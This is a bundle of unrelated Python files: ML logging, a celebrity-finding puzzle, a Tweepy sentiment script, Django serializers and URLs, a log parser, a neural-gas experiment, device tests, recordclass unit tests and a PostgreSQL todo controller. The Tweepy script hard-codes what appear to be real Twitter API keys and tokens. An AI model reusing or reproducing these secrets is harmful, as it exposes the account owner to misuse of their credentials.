            test_time (float) -- time used for testing this epoch
        """
        write_message = '{:s}\t'.format(str(epoch))
        print_message = '[TEST] [Epoch: {:4d}] '.format(int(epoch))
        for name, metric in metrics.items():
            write_message += '{:.6f}\t'.format(np.mean(metric))
            print_message += name + ': {:.6f} '.format(np.mean(metric))
            self.test_writer.add_scalar(name, np.mean(metric), epoch)
        with open(self.test_summary_filename, 'a') as log_file:
            log_file.write(write_message + '\n')
        test_time_msg = 'Testing time used: {:.3f}s'.format(test_time)
        print_message += '\n' + test_time_msg
        print(print_message)
        with open(self.test_log_filename, 'a') as log_file:
            log_file.write(test_time_msg + '\n')
    def save_fake_omics(self, fake_dict, sample_list, feature_list):
        """
        save the fake omics data to disc
        Parameters:
            fake_dict (OrderedDict)) -- the fake omics data and the corresponding index
            sample_list (ndarray) -- the sample list for the input data
            feature_list (ndarray) -- the feature list of the generated omics data
        """
        # Map generated rows back to their sample names via the stored index.
        output_sample_list = sample_list[fake_dict['index'].astype(int)]
        fake_df = pd.DataFrame(data=fake_dict['fake'].T, index=feature_list, columns=output_sample_list)
        print('Saving generated omics file...')
        # NOTE(review): the output name 'fake_A' is hard-coded — confirm
        # whether other modalities (e.g. 'fake_B') should be supported.
        save_file(self.param, fake_df, 'fake_A')
|
# coding=utf-8
# 我的想法是
# 我随机选一个人,然后看这个人是否know anyone in potential group
# 如果他知道其中任何一个人,那么他就不可能是要找的那个人,
#
# The knows API is already defined for you.
# @param a, person a
# @param b, person b
# @return a boolean, whether a knows b
# def knows(a, b):
from random import randint
class Solution(object):
    def findCelebrity(self, n):
        """
        :type n: int
        :rtype: int

        One-pass candidate elimination: whenever the current candidate
        knows person i, the candidate cannot be the celebrity, so i takes
        over. The final candidate is then verified.
        """
        # FIX: xrange is Python-2-only (NameError on Python 3); range is
        # behavior-identical here and works on both versions.
        x = randint(0, n - 1)
        for i in range(n):
            if knows(x, i):
                x = i
        # The sweep already proved x knows nobody scanned after it became
        # candidate, so only indices before x still need checking.
        if any(knows(x, i) for i in range(x)):
            return -1
        # Everybody must know the celebrity.
        if any(not knows(i, x) for i in range(n)):
            return -1
        return x
import csv
import re
import sys
import tweepy
from textblob import TextBlob
# Step 1 - Authenticate against the Twitter API
# SECURITY NOTE(review): real API credentials are hard-coded and committed
# here; they should be revoked and loaded from environment variables or a
# secrets store instead.
consumer_key = 'OoKtdnkn2PhPdVopgcPPVszBL'
consumer_secret = 'zJCI08nnQ7wGiosCOe7Udbu4PlpchanXFbjytZZJFkontr2wOC'
access_token = '572213920-pfExxBDxG4W7gu6ke8Yh1xexYcypE9QOddfvpY6u'
access_token_secret = 'C2tOsrGpF48uBoxVjcyHYptljLpfAesln2ABZacpLy1mL'
# Step 2 - Build the authenticated API client
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
# Step 3 - Search tweets for the term given as the first CLI argument
public_tweets = api.search(sys.argv[1])
# Step 4 - Clean up each tweet's text
def clean_tweet(tweet):
    """Strip @mentions, URLs and non-alphanumeric characters from *tweet*,
    collapsing the removed runs into single spaces."""
    # FIX: the pattern is now a raw string; '\w' and '\/' in a plain string
    # trigger invalid-escape DeprecationWarnings on modern Python.
    tweet = ' '.join(re.sub(r"(@[A-Za-z0-9]+)|([^0-9A-Za-z \t])|(\w+:\/\/\S+)", " ", tweet).split())
    return tweet
# Step 5 - The second CLI argument is the output CSV path
# FIX: the file handles are now managed by 'with' blocks (the old code used
# a manual try/finally for the writer and never closed the read handle).
with open(sys.argv[2], 'wt') as f:
    # Step 5.0 - write the header row
    writer = csv.writer(f)
    writer.writerow(('Tweet', 'Sentiment'))
    # Step 5.1 - iterate over the fetched tweets
    for tweet in public_tweets:
        cleaned_tweet = clean_tweet(tweet.text)
        _analysis = TextBlob(cleaned_tweet)
        # Step 5.2 - classify by polarity sign
        if (_analysis.sentiment.polarity > 0):
            sentiment = 'POSITIVE'
        elif (_analysis.sentiment.polarity == 0):
            sentiment = 'NEUTRAL'
        else:
            sentiment = 'NEGATIVE'
        writer.writerow((cleaned_tweet, sentiment))
# Step 6 - echo the finished document
with open(sys.argv[2], 'rt') as result_file:
    print(result_file.read())
# EXAMPLE python demo.py "palabra_a_buscar" "nombre_archivo.csv"
|
from rest_framework import serializers
from .models import Car, Cart, UserCars
class CarSerializer(serializers.ModelSerializer):
    """Expose every field of the Car model through DRF."""
    class Meta:
        model = Car
        fields = "__all__"
class CartSerializer(serializers.ModelSerializer):
    """Expose every field of the Cart model through DRF."""
    class Meta:
        model = Cart
        fields = "__all__"
class UserCarsSerializer(serializers.ModelSerializer):
    """Expose every field of the UserCars model through DRF."""
    class Meta:
        model = UserCars
        fields = "__all__"
|
from django_filters import rest_framework as filters
from apps.django.main.course.public import model_names as course_names
from apps.django.main.timetable.mixins import LessonFilterSetMixin
from ...models import Material
__all__ = [
"MaterialFilterSet"
]
class MaterialFilterSet(LessonFilterSetMixin):
    """Filter materials by announcement flag, publish window and course."""
    class Meta:
        model = Material
        fields = {
            "announce": ["exact"],
            "publish_datetime": ["lte", "gte"],
        }
    # Extra declared filter: match materials through their lesson's course id.
    course = filters.CharFilter(
        field_name="lesson__course__id",
        label=course_names.COURSE
    )
|
from django.urls import path
from . import views
urlpatterns = [
    path('words/', views.WordSet.as_view()),
    path('las/', views.LaSet.as_view()),
    path('cards/', views.CardSet.as_view()),
    path('intros/', views.IntroSet.as_view()),
    path('grammar-cards/', views.GrammarCardSet.as_view()),
    # BUG FIX: django's path() does not understand regex groups, so the old
    # pattern '(<pk>[0-9]+)/' could never match; use a path converter.
    path('grammar-cards/<int:pk>/', views.GrammarCardDetail.as_view()),
    path('alphabets/', views.AlphabetSet.as_view()),
]
|
import datetime

# Capture the current local time once so all printed fields are consistent.
now = datetime.datetime.now()
year = now.year
month = now.month
day = now.day
hour = now.hour
minute = now.minute
second = now.second
print("{}년 {}월 {}일 {}시 {}분 {}초".format(year, month, day, hour, minute, second))
# BUG FIX: the two conditions are mutually exclusive, so use if/else, and
# zero-pad the minute so e.g. 9:05 is no longer displayed as "9:5".
if hour < 12:
    print("현재 시각은 {}:{:02d} \'오전\' 입니다.".format(hour, minute))
else:
    print("현재 시각은 {}:{:02d} \'오후\' 입니다.".format(hour, minute))
|
# -*- encoding: utf-8 -*-
import re
from pyparsing import *
from datetime import datetime
import time
def Ignore_files(url):
    """Return False when the last path segment of *url* contains a dot
    (i.e. looks like a file), True otherwise."""
    last_segment = url[url.rfind('/'):]
    return '.' not in last_segment
def Ignore_www(url):
    """Strip the first occurrence of 'www.' from *url*; return the url
    unchanged when it contains none."""
    if 'www.' not in url:
        return url
    return url.replace("www.", "", 1)
def Ignore_urls(ignored_urls, url):
    """Return True when *url* is not listed in *ignored_urls*."""
    return url not in ignored_urls
def Start_at(data, start_at):
    """Return True when date *data* ('dd/Mon/YYYY') falls on or after the
    date part of *start_at* ('dd/Mon/YYYY HH:MM:SS')."""
    threshold = start_at[0:start_at.index(" ")]
    return datetime.strptime(data, "%d/%b/%Y") >= datetime.strptime(threshold, "%d/%b/%Y")
def Finish_at(data, stop_at):
    """Return True when date *data* ('dd/Mon/YYYY') falls on or before the
    date part of *stop_at* ('dd/Mon/YYYY HH:MM:SS')."""
    threshold = stop_at[0:stop_at.index(" ")]
    return datetime.strptime(data, "%d/%b/%Y") <= datetime.strptime(threshold, "%d/%b/%Y")
def Request_type(type, request_type):
    """Return True when the request method equals the wanted one."""
    return type == request_type
def parse(
        ignore_files=False,
        ignore_urls=None,
        start_at=None,
        stop_at=None,
        request_type=None,
        ignore_www=False,
        slow_queries=False
):
    """Parse 'log.log' and return the top-5 request counts per URL
    (or the top-5 average response times when slow_queries=True).

    Filters: ignore_files drops file-like URLs, ignore_urls drops listed
    URLs, start_at/stop_at bound the date range, request_type keeps one
    HTTP method, ignore_www strips a leading 'www.'.
    """
    # FIX: the old mutable default ([]) was shared between calls;
    # normalize None -> fresh empty list instead.
    if ignore_urls is None:
        ignore_urls = []
    # Grammar for one access-log line — built once, not once per line.
    request_date = Word(alphas + '/' + nums)
    request_time = Word(alphas + ':' + nums)
    method = Word(alphas)
    request = Word(printables)
    protocol = Word(alphas + nums + '/' + '.')
    response_code = Word(nums)
    response_time = Word(nums)
    line_grammar = ('[' + request_date + request_time + '] "' + method
                    + request + protocol + '" ' + response_code + response_time)
    stats = {}  # url -> [hit_count, total_response_time]; no builtin shadowing
    # FIX: the file handle is now closed via 'with'.
    with open('log.log', 'r') as log_file:
        for line in log_file:
            try:
                result = line_grammar.parseString(line)
            except Exception:  # FIX: narrowed from a bare 'except:'
                continue
            # Token layout: [1]=date [2]=time [4]=method [5]=request
            # [6]=protocol [8]=code [9]=response time.
            url = result[5]
            url = url[url.find("//") + 2:]
            if "?" in url:
                url = url[0:url.find("?")]
            if "#" in url:
                url = url[0:url.find("#")]
            date = result[1]
            req_type = result[4]
            worktime = result[9]
            if start_at is not None and not Start_at(date, start_at):
                continue
            if stop_at is not None and not Finish_at(date, stop_at):
                break
            if ignore_files and not Ignore_files(url):
                continue
            if ignore_urls and not Ignore_urls(ignore_urls, url):
                continue
            if request_type is not None and not Request_type(req_type, request_type):
                continue
            if ignore_www:
                url = Ignore_www(url)
            if url in stats:
                stats[url][0] += 1
                stats[url][1] += int(worktime)
            else:
                stats[url] = [1, int(worktime)]
    if slow_queries:
        averages = [int(total / count) for count, total in stats.values()]
        averages.sort(reverse=True)
        return averages[0:5]
    hits = [count for count, _ in stats.values()]
    hits.sort(reverse=True)
    return hits[0:5]
import numpy as np
import sys
from neural_gas_marconi import NeuralGasNode
from numpy import *
from PIL import Image
import datetime
from random import shuffle
import os
import errno
#import sys
start_time= datetime.datetime.now()
'''
Training input file can be selected by properly specifying n_cats andn_reps
'''
#number of categories --> possible values: 2,4,8
n_cats=2
#number of examples for each category --> possible values: 20(only for n_cats=2),30
n_reps=30
#number of training examples of each class actually used in the training phase
#(randomly extracted from the n_reps input file examples)
n_examples=5
#enable/disable normalization over the training/testing set
normalize=False
# Input file names are derived from the category/repetition counts above.
infile = 'chartrj_'+str(n_cats)+'cat'+str(n_reps)+'rep_train.txt'
testfile = 'chartrj_'+str(n_cats)+'cat'+str(n_reps)+'rep_test.txt'
'''
Neural Gas parameters initialization
'''
#n_xnodes*n_ynodes -> total number of neurons
n_xnodes=10
n_ynodes=10
# k: neighborhood size used for the alfa-weighted context (see alfak below)
k=3
n_of_features=3
#n_features_vectors=len(features_vector)
n_epochs=5
# lambda/epsilon anneal from their init_* to final_* values during training
init_lambda=0.05*n_xnodes*n_ynodes
final_lambda=0.01
init_epsilon=0.3
final_epsilon=0.001
beta=0.5
# the alfa parameters weights express the importance of the current
# input signal over the past
alfa0=0.5
alfak=0.5/k #equal to 0.5/K
print 'Starting...', start_time
def make_sure_path_exists(path):
    """Check if the provided path exists. If it does not exist, create it."""
    try:
        os.makedirs(path)
    except OSError as error:
        # An already-existing directory is fine; anything else is re-raised.
        if error.errno != errno.EEXIST:
            raise
# piece of code from create_ds_all.py
def slices_from_resets_with_cat(cat, reset):
    """
    Receives an array composed of 0s and 1s and returns the slices contained
    between 1s, grouped by the category of each slice's first sample.
    """
    # Indices where a new repetition starts (reset flag set).
    resets = np.argwhere(reset).ravel()
    # Computes the slices for each repetition
    repetition_slices = {}
    begin = 0
    for r in resets:
        if r == begin:
            continue
        # FIX: dict.has_key() was removed in Python 3; setdefault keeps the
        # code valid on both Python 2 and 3 with identical behavior.
        repetition_slices.setdefault(cat[begin], []).append(slice(begin, r))
        begin = r
    # The tail after the last reset forms the final slice.
    repetition_slices.setdefault(cat[begin], []).append(slice(begin, len(reset)))
    return repetition_slices
def normalize_vector(input_vector):
    """Return a row-wise L2-normalized copy of the 2-D array
    *input_vector*; all-zero rows are copied through unchanged
    (dividing them would produce NaNs)."""
    rows = len(input_vector)
    normalized_vector = zeros((rows, input_vector.shape[1]))
    for i in range(rows):
        row = input_vector[i]
        norm_sq = sum(row * row)
        if norm_sq == 0:  # some rows are all zeros
            normalized_vector[i] = row
        else:
            normalized_vector[i] = row / sqrt(norm_sq)
    return normalized_vector
# ---- Load the training set and build the per-example input vectors ----
print 'Loading data from ', infile, '....'
data = np.loadtxt(infile,skiprows=1)
#total number of rows in the input file
total_points = data.shape[0]
print 'loaded: ', data.shape
print 'input_dim', data.shape[1]
print "Categories: ", np.unique(data[:,0])
'''
print 'categories_vector', data[:,0]
print 'only 2,3,4 columns:'
print data[:,(2,3,4)]
'''
print "total points",total_points
print '******************'
#slices to be used in order to have indexes of the examples in the dataset (not currently used)
total_slices = slices_from_resets_with_cat(data[:,0],data[:,1])
slices=[]
#extract n_examples from slices, randomly chosen per category
for cat in total_slices:
    shuffle(total_slices[cat])
    slices.append(total_slices[cat][0:n_examples])
#print slices
#features vectors list (categories and reset columns are omitted)
features_vector = data[:,(2,3,4)]
#categories vector (needed for supervised learning)
categories_vector = data[:,0]
#parameter to be passed to the network for classification
categories = np.unique(data[:,0])
print 'input classes'
for c in total_slices.keys():
    print c
# Optionally L2-normalize each (x, y, z) feature row.
if normalize:
    norm_features_vector = normalize_vector(features_vector)
else:
    norm_features_vector = features_vector
#print norm_features_vector
#categories_vector reshaped in order to be re-assembled to features_vectors
categories_vector = categories_vector.reshape(norm_features_vector.shape[0],1)
#categories_vector re-assembled with the features_vectors
normalized_data_vector = np.append(categories_vector, norm_features_vector, axis=1)
#based on the previously found slices, the input_vector is built as a list of examples(i.e. sequences of samples (cat,x,y,z))
input_vector=[]
for s in slices:
    for i in s:
        input_vector.append(normalized_data_vector[i])
'''
Neural Gas instantiation and training
'''
# Build the (supervised) Neural Gas network with the hyper-parameters above.
ng=NeuralGasNode(
    n_xnodes,
    n_ynodes,
    k,
    init_epsilon,
    final_epsilon,
    # epsilon,
    init_lambda,
    final_lambda,
    # current_lambda,
    beta,
    n_epochs,
    n_of_features,
    # n_features_vectors,
    categories,
    alfa0,
    alfak,
    weight_matrix=None)
print 'start training - ', n_xnodes * n_ynodes,'nodes'
#print 'category_matrix'+str(n_cats)+'cat_'+str(n_examples)+'_rep_beta'+str(beta)+\
#    '__'+str(n_epochs)+'epochs__'+str(n_xnodes*n_ynodes)+'_neurons.png'
print 'beta', beta
print 'K', k
# Time the training run (reported after ng.train returns).
start_training=datetime.datetime.now()
ng.train(input_vector)
'''
w_m = ng.weight_matrix
print 'Weight Matrix:'
for i in range(len(w_m)):
    for j in range(len(w_m)):
        print w_m[i][j]
'''
end_training=datetime.datetime.now()
training_time = end_training-start_training
print 'end training - ', n_xnodes * n_ynodes,'nodes', ' - Training Time: ',training_time
'''
#draw ng.bmu_matrix to glance at the occurrences of each neuron as BMU in a graphic way
w,h = ng.n_xnodes,n_ynodes
data = np.zeros( (w,h,3), dtype=np.uint8)
for x in range(w):
    # print a.bmu_matrix[x]
    for y in range(h):
        data[x,y] = [0,ng.bmu_matrix[x][y],0]
img = Image.fromarray(data, 'RGB')
img.save('bmu_matrix.png')
'''
#TESTING SECTION
#Testing is performed over the corresponding testing dataset
#All the examples of the testing dataset are submitted to the neural gas
#Each record in the dataset is labeled depending on the label of the BMU
print '---------TESTING------------'
print 'Loading data from ', testfile, '....'
test_data = np.loadtxt(testfile,skiprows=1)
# Same preprocessing pipeline as the training data above.
test_slices = slices_from_resets_with_cat(test_data[:,0],test_data[:,1])
test_features_vector = test_data[:,(2,3,4)]
test_categories_vector = test_data[:,0]
if normalize:
    test_features_vector = normalize_vector(test_features_vector)
else:
    test_features_vector = test_features_vector
#print test_features_vector
test_categories_vector = test_categories_vector.reshape(test_features_vector.shape[0],1)
test_data_vector = np.append(test_categories_vector, test_features_vector, axis=1)
test_input_vector=[]
for s in test_slices.values():
    for i in s:
        test_input_vector.append(test_data_vector[i])
print 'start TESTING - ', n_xnodes * n_ynodes,'nodes'
start_testing=datetime.datetime.now()
ng.test(test_input_vector)
end_testing=datetime.datetime.now()
testing_time = end_testing-start_testing
print 'end testing - ', n_xnodes * n_ynodes,'nodes', ' -> Testing Time: ',testing_time
# Success rates are computed by ng.test and exposed as attributes.
print 'Success rate:' , ng.success_rate, '%'
print 'Success rate on examples:' , ng.example_success_rate, '%'
print 'Success rate by category:'
for cat in ng.success_rate_by_category:
    print cat, '->', ng.success_rate_by_category[cat]
#draw ng.neurons_labels_matrix to glance at the labels assigned to each neuron
w,h = ng.n_xnodes,n_ynodes
data = np.zeros( (w,h,3), dtype=np.uint8)
for x in range(w):
    # print a.bmu_matrix[x]
    for y in range(h):
        # Scale label ids by 30 so different labels are visually distinct greens.
        data[x,y] = [0,30*ng.neurons_labels_matrix[x][y],0]
img = Image.fromarray(data, 'RGB')
# Output file name encodes every hyper-parameter plus the achieved rates.
out_folder = 'tests_'+str(n_cats)+'cat_'+str(n_reps)+'_rep'
out_filename = 'category_matrix_'+str(n_cats)+'cat_'+str(n_examples)+\
    '_rep_beta_'+str(beta)+'__'+str(n_xnodes*n_ynodes)+'_neurons__'+\
    str(n_epochs)+'epochs__'+str(ng.success_rate)+'p__'+\
    str(ng.example_success_rate)+'ex__lambda_s_'+str(init_lambda)+\
    '_e_'+str(final_lambda)+'__k_'+str(ng.k)+'__norm_'+str(normalize)+'.png'
print '*********************'
print 'saving '+out_folder+'/'+out_filename+' ...'
make_sure_path_exists(out_folder)
img.save(out_folder+'/'+out_filename)
|
import os
import sys
import re
import subprocess
import re
import time
from time import sleep
from datetime import datetime
from cmds import CMDS
class SAMPLE_Test():
    """Scripted device smoke test driven through a CMDS command helper.

    Repeatedly toggles Bluetooth and auto-rotate, then takes a screenshot.
    NOTE(review): this file reached review with indentation stripped, so the
    loop nesting below was reconstructed from context -- confirm against the
    original source.
    """

    def __init__(self, uuid, divide_window=10):
        super().__init__()
        # CMDS wraps the device-control commands for the device identified by `uuid`.
        self.cmd = CMDS(uuid, divide_window)
        # self.display_flag = False
        # self.end_flag = False

    def run_script(self):
        # Required: the setup method must be called before any other command.
        self.cmd.setup_test()
        # ########################__airplane-mode test (disabled)__########################
        # self.cmd.cmd_status_airplaneOnOff(exe_type=1, delay=1)
        # self.cmd.cmd_status_backButton(iter_count=2)
        # sleep(2)
        # self.cmd.cmd_status_airplaneOnOff(exe_type=0, delay=1)
        # self.cmd.cmd_status_backButton(iter_count=2)
        # sleep(2)
        # self.cmd.cmd_status_airplaneOnOff(exe_type=0,delay=1)
        # self.cmd.cmd_status_backButton(iter_count=2)
        #
        # self.cmd.cmd_status_autoRotateOnOff(exe_type=1, delay=2)
        # sleep(3)
        # self.cmd.cmd_status_autoRotateOnOff(exe_type=0, delay=2)
        # sleep(3)
        # self.cmd.cmd_status_backButton(iter_count=2)
        for i in range(3):
            # ########################__Bluetooth on/off test__########################
            self.cmd.cmd_status_blueToothOnOff(exe_type=1, delay=1)
            self.cmd.cmd_status_backButton(iter_count=2)
            sleep(2)
            self.cmd.cmd_status_blueToothOnOff(exe_type=0, delay=1)
            self.cmd.cmd_status_backButton(iter_count=2)
            sleep(2)
            # "Off" is sent a second time -- presumably to exercise the
            # already-off state, mirroring the disabled airplane sequence above.
            self.cmd.cmd_status_blueToothOnOff(exe_type=0, delay=1)
            self.cmd.cmd_status_backButton(iter_count=2)
            # # ########################__auto-rotate (screen rotation) test__########################
            self.cmd.cmd_status_autoRotateOnOff(exe_type=1, delay=2)
            sleep(3)
            self.cmd.cmd_status_autoRotateOnOff(exe_type=0, delay=2)
            sleep(3)
            self.cmd.cmd_status_backButton(iter_count=2)
        # One screenshot at the end; the fixed name means per-iteration captures
        # would overwrite each other anyway.
        self.cmd.cmd_status_screenShot(delay=2, name='sample_test1')
if __name__ == "__main__":
    # Drive the scripted test against the device with this serial/UUID.
    lm350 = SAMPLE_Test('LMV350N7a33ed5c', divide_window=20)
    lm350.run_script()
|
"""Unit tests for recordclass.py."""
import unittest, doctest, operator
from recordclass.typing import RecordClass
import pickle
import typing
import sys as _sys
class CoolEmployee(RecordClass):
    # Two-field record shared as a fixture by the tests below.
    name: str
    cool: int
class CoolEmployeeWithDefault(RecordClass):
    # Fixture with a defaulted field (see test_annotation_usage_with_default).
    name: str
    cool: int = 0
class XMeth(RecordClass):
    # Fixture verifying that regular methods coexist with record fields.
    x: int

    def double(self):
        """Return twice the value of ``x``."""
        return 2 * self.x
class XRepr(RecordClass):
    # Fixture with custom __str__/__add__ (see test_annotation_usage_with_methods).
    x: int
    y: int = 1

    def __str__(self):
        return f'{self.x} -> {self.y}'

    def __add__(self, other):
        # Always 0 regardless of operand; the tests only check operator dispatch.
        return 0
class H(RecordClass, hashable=True):
    # Mutable yet hashable record; test_hash checks the hash changes on mutation.
    x: int
    y: int
class HR(RecordClass, readonly=True):
    # Read-only record; attribute assignment raises AttributeError (test_hash_subcls4).
    x: int
    y: int
class RecordClassTypingTest(unittest.TestCase):
    """Unit tests for the annotation-based API of recordclass.typing.RecordClass."""

    def test_recordclass_lists(self):
        # Mutable (list-valued) fields are accepted as positional arguments.
        class A(RecordClass):
            x:object
            y:object
        a = A([1,2,3],[3,4,5])

    def test_typing(self):
        # Keyword construction with annotated fields.
        class A(RecordClass):
            a: int
            b: int
            c: object
        tmp = A(a=1, b=2, c=[1,2,3])
        # self.assertEqual(repr(tmp), "A(a=1, b=2', c=[1, 2, 3])")
        # self.assertEqual(tmp.__annotations__, {'a': int, 'b': int, 'c': object})

    def test_recordclass_basics(self):
        # Positional and keyword construction, plus class metadata
        # (__fields__, __annotations__).
        class Emp(RecordClass):
            name:str
            id:int
        joe = Emp('Joe', 42)
        jim = Emp(name='Jim', id=1)
        self.assertIsInstance(joe, Emp)
        self.assertEqual(joe.name, 'Joe')
        self.assertEqual(joe.id, 42)
        self.assertEqual(jim.name, 'Jim')
        self.assertEqual(jim.id, 1)
        self.assertEqual(Emp.__name__, 'Emp')
        self.assertEqual(Emp.__fields__, ('name', 'id'))
        self.assertEqual(Emp.__annotations__,
                         dict([('name', str), ('id', int)]))

    def test_annotation_usage(self):
        tim = CoolEmployee('Tim', 9000)
        self.assertIsInstance(tim, CoolEmployee)
        self.assertEqual(tim.name, 'Tim')
        self.assertEqual(tim.cool, 9000)
        self.assertEqual(CoolEmployee.__name__, 'CoolEmployee')
        self.assertEqual(CoolEmployee.__fields__, ('name', 'cool'))
        self.assertEqual(CoolEmployee.__annotations__,
                         dict(name=str, cool=int))

    def test_annotation_usage_with_default(self):
        # A missing argument falls back to the declared default.
        jelle = CoolEmployeeWithDefault('Jelle')
        self.assertIsInstance(jelle, CoolEmployeeWithDefault)
        self.assertEqual(jelle.name, 'Jelle')
        self.assertEqual(jelle.cool, 0)
        cooler_employee = CoolEmployeeWithDefault('Sjoerd', 1)
        self.assertEqual(cooler_employee.cool, 1)
        self.assertEqual(CoolEmployeeWithDefault.__name__, 'CoolEmployeeWithDefault')
        self.assertEqual(CoolEmployeeWithDefault.__fields__, ('name', 'cool'))
        #self.assertEqual(CoolEmployeeWithDefault._field_types, dict(name=str, cool=int))
        # A field without a default may not follow a defaulted one.
        with self.assertRaises(TypeError):
            exec("""
class NonDefaultAfterDefault(RecordClass):
    x: int = 3
    y: int
""")

    def test_annotation_usage_with_methods(self):
        self.assertEqual(XMeth(1).double(), 2)
        self.assertEqual(XMeth(42).x, XMeth(42)[0])
        self.assertEqual(str(XRepr(42)), '42 -> 1')
        self.assertEqual(XRepr(1, 2) + XRepr(3), 0)
        # Overriding a reserved attribute such as __fields__ must be rejected.
        with self.assertRaises(TypeError):
            exec("""
class XMethBad(RecordClass):
    x: int
    def __fields__(self):
        return 'no chance for this'
""")

    def test_recordclass_keyword_usage(self):
        class LocalEmployee(RecordClass):
            name:str
            age:int
        nick = LocalEmployee('Nick', 25)
        self.assertEqual(nick.name, 'Nick')
        self.assertEqual(LocalEmployee.__name__, 'LocalEmployee')
        self.assertEqual(LocalEmployee.__fields__, ('name', 'age'))
        self.assertEqual(LocalEmployee.__annotations__, dict(name=str, age=int))
        #self.assertIs(LocalEmployee._field_types, LocalEmployee.__annotations__)
        # Mixing the functional form with keyword field arguments is rejected.
        with self.assertRaises(TypeError):
            RecordClass('Name', [('x', int)], y=str)
        with self.assertRaises(TypeError):
            RecordClass('Name', x=1, y='a')

    def test_hash(self):
        a = HR(1, 2)
        #self.assertEqual(hash(a), hash(tuple(a)))
        b = H(1, 2)
        hash_b = hash(b)
        #self.assertEqual(hash_b, hash(tuple(b)))
        # Mutating a hashable record changes its hash value.
        b.x = -1
        self.assertNotEqual(hash(b), hash_b)

    def test_hash_subcls(self):
        # Plain subclasses of a hashable record stay hashable.
        class B(H): pass
        b = B(1,2)
        hash(b)

    def test_hash_subcls2(self):
        # A subclass may override __hash__.
        class B(H):
            def __hash__(self):
                return 0
        b = B(1,2)
        hash(b)

    def test_hash_subcls3(self):
        # Overriding __hash__ on a readonly record also works.
        class B(HR):
            def __hash__(self):
                return 0
        b = B(1,2)
        hash(b)

    def test_hash_subcls4(self):
        # Readonly-ness is inherited: assignment still raises.
        class B(HR):
            pass
        b = B(1,2)
        with self.assertRaises(AttributeError):
            b.x = 1

    def test_pickle(self):
        # The class must be module-global so pickle can locate it by name.
        global Emp
        class Emp(RecordClass):
            name:str
            id:int
        jane = Emp('jane', 37)
        for proto in range(pickle.HIGHEST_PROTOCOL + 1):
            z = pickle.dumps(jane, proto)
            jane2 = pickle.loads(z)
            self.assertEqual(jane2, jane)

    def test_pickle2(self):
        global Emp2
        class Emp2(RecordClass):
            name:str
            id:int
        jane = Emp2('jane', 37)
        for proto in range(pickle.HIGHEST_PROTOCOL + 1):
            z = pickle.dumps(jane, proto)
            jane2 = pickle.loads(z)
            self.assertEqual(jane2, jane)

    def test_pickle3(self):
        # Round-trip a module-level record class through every pickle protocol.
        jane = CoolEmployee('jane', 37)
        for proto in range(pickle.HIGHEST_PROTOCOL + 1):
            z = pickle.dumps(jane, proto)
            jane2 = pickle.loads(z)
            self.assertEqual(jane2, jane)
def main():
    """Build and return the test suite for this module.

    Uses ``TestLoader.loadTestsFromTestCase`` because ``unittest.makeSuite``
    is deprecated since Python 3.11 and removed in Python 3.13.
    """
    suite = unittest.TestSuite()
    suite.addTest(unittest.TestLoader().loadTestsFromTestCase(RecordClassTypingTest))
    return suite
|
import psycopg2
from datetime import datetime
from .todo_controller import TodoController
class GoalController:
    """CRUD/display controller for goal rows stored in a PostgreSQL table.

    SECURITY NOTE: ``self.list`` (the goal table name) is interpolated into
    SQL with f-strings -- it must come from trusted configuration, never from
    user input. All *values* are passed as bound ``%s`` parameters.

    Row layout assumed by pretty_print_goals (from ``SELECT *``):
    0=id, 1=title, 2=note, 3=tickets, 4=counts, 5=counts_done, 6=tag, 7=type.
    """

    def __init__(self, connection, list, todo_list):
        # `list` shadows the builtin; the name is kept for API compatibility.
        self.connection = connection
        self.list = list
        self.tag = "all"  # current tag filter; "all" disables filtering
        self.controller = TodoController(connection, todo_list)

    def show_tags(self):
        """Return the distinct tags found in the goal table, or False on DB error."""
        try:
            cursor = self.connection.cursor()
            distinct_tag = f"SELECT DISTINCT tag FROM {self.list}"
            cursor.execute(distinct_tag)
            return cursor.fetchall()
        except (Exception, psycopg2.Error) as error:
            print("Error while connecting to PostgreSQL", error)
            return False

    def switch_tag(self, tag):
        """Set the tag filter used by show()."""
        self.tag = tag

    def add_repeat_goal(self):
        """Interactively create a 'repeat' goal plus its `repeat` todo tickets.

        Only the first generated ticket is VISIBLE; the rest presumably become
        visible as the goal progresses. Returns True on success, False on DB
        error.
        """
        try:
            cursor = self.connection.cursor()
            title = input("Title: ")
            note = input("Note: ")
            repeat = int(input("Repeat: "))
            tag = input("Tag: ")
            ticket_title = input("Ticket title: ")
            ticket_note = input("Ticket note: ")
            ticket_diff = input("Ticket diff: ")
            goal_type = "repeat"
            dt = datetime.now()
            insert_goal = (f"INSERT INTO {self.list} (TITLE, NOTE," +
                           f"TICKETS, COUNTS, COUNTS_DONE, TAG, COMPLETED," +
                           f"START_DATE, TYPE) VALUES (%s, %s, %s, %s, 0," +
                           f"%s, FALSE, %s, %s)")
            cursor.execute(insert_goal, [title, note, ticket_title, repeat, tag, dt, goal_type])
            self.connection.commit()
            for i in range(repeat):
                # Only the first ticket starts visible; the SQL literal is the
                # only difference between the two original branches.
                visible = "TRUE" if i == 0 else "FALSE"
                insert_ticket = (f"INSERT INTO todo (TITLE, NOTE, DIFFICULTY," +
                                 f"TAG, COMPLETED, START_DATE, VISIBLE, GOAL) VALUES (%s, %s, %s," +
                                 f"%s, FALSE, %s, {visible}, %s)")
                cursor.execute(insert_ticket, [ticket_title, ticket_note, ticket_diff, tag, dt, title])
                self.connection.commit()
            return True
        except (Exception, psycopg2.Error) as error:
            print("Error while connecting to PostgreSQL", error)
            return False

    def del_ticket(self, id):
        """Delete goal `id` and every todo ticket sharing its ticket title.

        Returns True on success, False on DB error.
        NOTE(review): the lookup hard-codes the table name 'goal' while every
        other query uses self.list -- confirm this is intentional.
        """
        try:
            cursor = self.connection.cursor()
            select_ticket = "SELECT TICKETS FROM goal WHERE id = %s;"
            cursor.execute(select_ticket, [id])
            ticket_name = cursor.fetchall()[0][0]
            # Remove every todo generated from this goal's ticket template.
            delete_todos = "DELETE FROM todo WHERE title = %s;"
            cursor.execute(delete_todos, [ticket_name])
            self.connection.commit()
            delete_goal = f"DELETE FROM {self.list} WHERE id = %s;"
            cursor.execute(delete_goal, [id])
            self.connection.commit()
            return True
        except (Exception, psycopg2.Error) as error:
            print("Error while connecting to PostgreSQL", error)
            return False

    def done_ticket(self, id):
        """Mark goal `id` completed, stamping end_date with the current time."""
        try:
            cursor = self.connection.cursor()
            dt = datetime.now()
            done_ticket = (f"UPDATE {self.list} SET completed = TRUE," +
                           f"end_date = %s WHERE id = %s")
            cursor.execute(done_ticket, [dt, id])
